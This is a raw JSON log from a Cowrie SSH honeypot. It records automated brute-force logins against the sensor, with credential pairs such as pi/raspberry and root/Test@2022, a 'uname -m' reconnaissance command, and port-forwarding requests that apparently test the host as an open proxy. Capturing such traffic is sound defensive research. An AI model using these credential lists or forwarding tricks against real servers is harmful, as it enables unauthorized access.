{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:46.449707Z","src_ip":"192.3.96.146","session":"75d794fbe25f"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:35:47.160490Z","src_ip":"212.227.125.160","session":"467459ff184d"}
{"eventid":"cowrie.session.connect","src_ip":"192.3.96.146","src_port":34892,"dst_ip":"1.2.3.4","dst_port":22,"session":"45758776bb11","protocol":"ssh","message":"New connection: 192.3.96.146:34892 (1.2.3.4:22) [session: 45758776bb11]","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.130332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.131297Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.244167Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.278077Z","src_ip":"212.227.235.229","session":"9ec50a3ab108"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.278980Z","src_ip":"212.227.235.229","session":"9ec50a3ab108"}
{"eventid":"cowrie.login.success","username":"root","password":"cnc.c0for123","message":"login attempt [root/cnc.c0for123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.574624Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:35:48.809952Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.810731Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.921595Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.922832Z","src_ip":"192.3.96.146","session":"45758776bb11"}
{"eventid":"cowrie.session.closed","duration":12.933045387268066,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:48.999263Z","src_ip":"212.227.125.160","session":"31263c73598b"}
{"eventid":"cowrie.session.closed","duration":"32.0","message":"Connection lost after 32.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:54.036191Z","src_ip":"212.227.125.160","session":"467459ff184d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48392,"dst_ip":"1.2.3.4","dst_port":22,"session":"29758a5f2337","protocol":"ssh","message":"New connection: 212.227.125.160:48392 (1.2.3.4:22) [session: 29758a5f2337]","sensor":"my-vps","timestamp":"2025-08-31T04:36:03.815803Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47762,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd8527af308","protocol":"ssh","message":"New connection: 212.227.125.160:47762 (1.2.3.4:22) [session: 6dd8527af308]","sensor":"my-vps","timestamp":"2025-08-31T04:36:10.181304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:10.182414Z","src_ip":"212.227.125.160","session":"6dd8527af308"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:10.369852Z","src_ip":"212.227.125.160","session":"6dd8527af308"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:10.933679Z","src_ip":"212.227.125.160","session":"6dd8527af308"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:12.123899Z","src_ip":"212.227.125.160","session":"6dd8527af308"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57752,"dst_ip":"1.2.3.4","dst_port":22,"session":"b287801364af","protocol":"ssh","message":"New connection: 212.227.235.229:57752 (1.2.3.4:22) [session: b287801364af]","sensor":"my-vps","timestamp":"2025-08-31T04:36:12.289659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:13.397488Z","src_ip":"212.227.235.229","session":"b287801364af"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:36:13.398129Z","src_ip":"212.227.235.229","session":"b287801364af"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":57108,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bd097722e47","protocol":"ssh","message":"New connection: 79.127.48.196:57108 (1.2.3.4:22) [session: 6bd097722e47]","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.354759Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48702,"dst_ip":"1.2.3.4","dst_port":22,"session":"a40f12f78677","protocol":"ssh","message":"New connection: 77.83.207.83:48702 (1.2.3.4:22) [session: a40f12f78677]","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.512587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.513555Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.566543Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.823988Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22717,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22717","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.876713Z","session":"a40f12f78677"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:36:14.928898Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":15355,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15355","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.074600Z","session":"a40f12f78677"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.126419Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47818,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbed788c784c","protocol":"ssh","message":"New connection: 212.227.125.160:47818 (1.2.3.4:22) [session: dbed788c784c]","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.174689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.175505Z","src_ip":"212.227.125.160","session":"dbed788c784c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24274,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24274","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.270242Z","session":"a40f12f78677"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.322220Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.358584Z","src_ip":"212.227.125.160","session":"dbed788c784c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.374902Z","src_ip":"77.83.207.83","session":"a40f12f78677"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:15.908611Z","src_ip":"212.227.125.160","session":"dbed788c784c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:17.094007Z","src_ip":"212.227.125.160","session":"dbed788c784c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"letmein","message":"login attempt [oracle/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:19.190548Z","src_ip":"212.227.235.229","session":"b287801364af"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:20.999415Z","src_ip":"212.227.235.229","session":"b287801364af"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60158,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a823d19ed2d","protocol":"ssh","message":"New connection: 217.72.205.35:60158 (1.2.3.4:22) [session: 5a823d19ed2d]","sensor":"my-vps","timestamp":"2025-08-31T04:36:22.906563Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:22.907819Z","src_ip":"217.72.205.35","session":"5a823d19ed2d"}
{"eventid":"cowrie.session.closed","duration":"24.2","message":"Connection lost after 24.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:28.029131Z","src_ip":"212.227.125.160","session":"29758a5f2337"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60682,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d4a39fb01b","protocol":"ssh","message":"New connection: 212.227.125.160:60682 (1.2.3.4:22) [session: 85d4a39fb01b]","sensor":"my-vps","timestamp":"2025-08-31T04:36:30.294101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:30.295133Z","src_ip":"212.227.125.160","session":"85d4a39fb01b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:30.482706Z","src_ip":"212.227.125.160","session":"85d4a39fb01b"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:31.046916Z","src_ip":"212.227.125.160","session":"85d4a39fb01b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:32.236740Z","src_ip":"212.227.125.160","session":"85d4a39fb01b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47994,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4ece09ffd2a","protocol":"ssh","message":"New connection: 212.227.125.160:47994 (1.2.3.4:22) [session: c4ece09ffd2a]","sensor":"my-vps","timestamp":"2025-08-31T04:36:33.381147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:34.008432Z","src_ip":"212.227.125.160","session":"c4ece09ffd2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:36:34.009218Z","src_ip":"212.227.125.160","session":"c4ece09ffd2a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.247986Z","src_ip":"212.227.235.229","session":"9ec50a3ab108"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.355631Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
